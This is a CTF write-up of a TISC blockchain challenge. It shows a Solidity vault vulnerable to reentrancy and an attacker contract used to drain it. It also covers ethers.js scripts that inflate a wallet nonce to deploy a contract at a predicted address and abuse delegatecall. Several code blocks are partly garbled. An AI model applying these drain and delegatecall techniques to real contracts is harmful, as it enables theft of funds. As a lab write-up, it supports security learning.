This was my first time doing an actual blockchain challenge, with my only prior experience being a short blockchain workshop organised by Jin Kai during the Greyhats 2024 summit. However, seeing as how all the participants who had passed level 6 at that point solved the blockchain challenge rather than the cloud one, and since a cursory examination of the cloud challenge reminded me of the very difficult DevSecMeow challenge from last year's TISC, I decided to take the blockchain/rev route. Fortunately, this challenge proved to be not too difficult (for a blockchain challenge).
For most of this challenge I used Metamask and Remix IDE.
Reentrancy attack
We have 2 contracts, Noncevigator and TravelFundvault. Looking at TravelFundvault, I was surprised to see that it was vulnerable to a reentrancy attack (the one blockchain vuln I learned during the workshop).
contract TravelFundvault {
mapping(address => uint256) private userBalances;
constructor() payable {
msg.value == 180 ether,
"Initial funding of 180 ether required"
function deposit() external payable {
userBalances[msg.sender] += msg.value;
function withdraw() external {
uint256 balance = getUserBalance(msg.sender);
require(balance > 0, "Insufficient balance");
(bool success, ) ={value: balance}("");
require(success, "Failed to withdraw Ether");
userBalances[msg.sender] = 0;
function getBalance() external view returns (uint256) {
return address(this).balance;
function getUserBalance(address _user) public view returns (uint256) {
return userBalances[_user];
I wrote the following contract to drain TravelFundvault's funds
contract MyContract {
TravelFundvault _addr;
uint256 internal _counter;
constructor(address _address) payable {
_addr = TravelFundvault(payable(_address));
_counter = 0;
receive() external payable {
if (_counter < 90) {
_counter += 1;
function withdraw() external {
(bool success, ) ={value: address(this).balance}("");
require(success, "Transfer failed");
function solve() external {
// you can call a function while sending ether like this!
_addr.deposit{value: 1 ether}();
For some reason, the contract was erroring out whenever I tried to withdraw all 180 ether at once, so I had to deploy the contract 2 times to get all the ether.
After getting all 180 ether, I tried to call the startUnlockGate transaction:
function startUnlockingGate(string calldata _destination) public {
require(treasureLocations[_destination] != address(0));
require(msg.sender.balance >= 170 ether);
(bool success, bytes memory retValue) = treasureLocations[_destination]
require(success, "Denied entry!");
require(abi.decode(retValue, (bool)), "Cannot unlock gate!");
Unfortunately, this transaction fails for an unknown reason. The unlockgate function isn't defined anywhere, and neither are the contracts for each location. I initially assumed that at each location address, there was a contract deployed but the implementation details were hidden from us, thus some checks in unlockgate were failing.
Guessing the nonce
I read the challenge description again: 'to access the treasure, you must navigate to the correct location and possess the correct value of the “number used only once”. A nonce is the number of transactions of a wallet or contract. So perhaps the unlockgate function is checking for a certain nonce?
I wrote a script using ethers.js which increments the nonce and calls startUnlockingGate() after each increment. (Note: I realised after some debugging that this chal's blockchain network doesn't handle multiple 'commands' in one request, so we have to pass batchMaxCount: 1
const { ethers } = require('ethers'); const abi = ... // Noncevigator contract abi, copied from artifacts/Noncevigator.json in remix (async function main() { const providerUrl = ""; // Replace with your provider URL const privateKey = "0x3e799a9d2ac9bc1ac55a8cc8632a2116f6846ded1e0c2d09498bb8e6be639200"; // Replace with your wallet's private key const contractAddress = "0xE622fc03CfC51E0fC737365FeF09C951a339bb21"; // Replace with your contract's address const provider = new ethers.JsonRpcProvider(providerUrl, ethers.Network.from({name: 'tisc l6b', chainId: 1337}), { batchMaxCount: 1, staticNetwork: true }); const wallet = new ethers.Wallet(privateKey, provider); console.log(await wallet.getNonce()); const contract = new ethers.Contract(contractAddress, abi, wallet); for (let i = 0; i < 2000; i++) { try { const origNonce = await wallet.getNonce(); console.log('running transaction: ' + i + ', nonce: ' + origNonce); const res = await contract.getTreasureLocation('pulauSemakau'); while ((await wallet.getNonce()) == origNonce) { await new Promise(resolve => setTimeout(resolve, 100)); } try { const res2 = await contract.startUnlockingGate('pulauSemakau'); console.log('success!'); console.log(res2); break; } catch (err) { if (err.error != null && err.error.message === 'invalid uuid specified') { console.log('server must have stopped'); console.log(err); break; } } console.log(`Transaction ${i + 1}/2000 complete:`, res.hash); } catch (err) { console.error(`Error in transaction ${i + 1}:`, err); } } })();
Unfortunately, this was a dead end and none of the startUnlockingGate transactions succeeded. I had to try something else.
Reversing bytecode?
After googling, I realised that it's possible to retrieve the bytecode of a contract from its address. Maybe we have to reverse the unlockgate function and figure out what nonce it's checking for. I used the following python script:
from web3 import Web3 rpc_url = '' web3 = Web3(Web3.HTTPProvider(rpc_url)) contract_address = "0xBe73bAC98415d3EC343BBe52a88644f827C21EFE" contract_bytecode = web3.eth.get_code(contract_address).hex() print(f"Contract Bytecode: {contract_bytecode}")
I tried running this with the address of the Noncevigator and TravelFundvault contracts and sure enough, the bytecode was printed. But when I ran the code with pulauSemakau's address, an empty byte string was returned, much to my bewilderment.
Eventually I realised that there wasn't actually a contract at that address; it was just pointing to nothing. But could we deploy a contract to that specific address, which implements unlockgate?
Final solution
Googling reveals that the address of a contract is determined by the creator's address and nonce. I wrote the following script (using ethers.js, modified from the above script) to check what is the value of nonce required to deploy the contract at pulauSemakau's address.
let nonce;
for (nonce = 0; nonce < 2000; nonce++) {
const anticipatedAddress = ethers.utils.getContractAddress({
from: wallet.address,
if (anticipatedAddress === targetAddress) {
console.log('required nonce:' + nonce);
This printed out a rather low number, around 30-40. So we can easily deploy a contract at this address.
Taking another look at startUnlockingGate shows that unlockgate is called with delegatecall
. I read this example which shows delegatecall allows the callee to access and modify the properties in the calling contract.
Putting all this together, I extended the script to run the requisite number of transactions so that the next contract deployment would be placed at the desired address.
const { ethers } = require('ethers') const abi = ... // Noncevigator contract abi, copied from artifacts/Noncevigator.json in remix (async function getCorrectNonce() { const providerUrl = ''; const privateKey = '0xec79e33eb5b2fad9aa9399a1316cfb007a78a1ba168add09172e59944b4d8bfd'; const contractAddress = '0x07943A109602236A4942e34f4F082d2b6A8B974B'; const targetAddress = '0x7d3eF26175F6483947941A3F6E74b7670bB5baF6'; const provider = new ethers.providers.JsonRpcProvider( providerUrl, { name: 'tisc l6b', chainId: 1337 }, { batchMaxCount: 1, staticNetwork: true, } ); const wallet = new ethers.Wallet(privateKey, provider); let nonce; for (nonce = 0; nonce < 2000; nonce++) { const anticipatedAddress = ethers.utils.getContractAddress({ from: wallet.address, nonce, }); if (anticipatedAddress === targetAddress) { break; } } console.log('required nonce:' + nonce); const origNonce = await wallet.getTransactionCount(); const contract = new ethers.Contract(contractAddress, abi, wallet); for (let i = 0; i < nonce - origNonce; i++) { try { await contract.getTreasureLocation('pulauSemakau'); console.log(`Transaction ${i + 1} complete`); } catch (err) { console.error(`Error in transaction ${i + 1}:`, err); } } while ((await wallet.getTransactionCount()) < nonce) { await new Promise((resolve) => setTimeout(resolve, 100)); } console.log('nonce is now as required: ' + nonce); return; })();
I also wrote a contract that extends Noncevigator:
contract Noncevigator2 {
... same code copied from Noncevigator ...
function unlockgate() public {
isLocationOpen["pulauSemakau"] = true;
I deployed this contract after running getCorrectNonce.js
, and sure enough it was at the correct address. Now calling startUnlockingGate()
succeeds! Checking the isSolved property shows we have solved the challenge!
I returned to the network instancer and obtained the flag: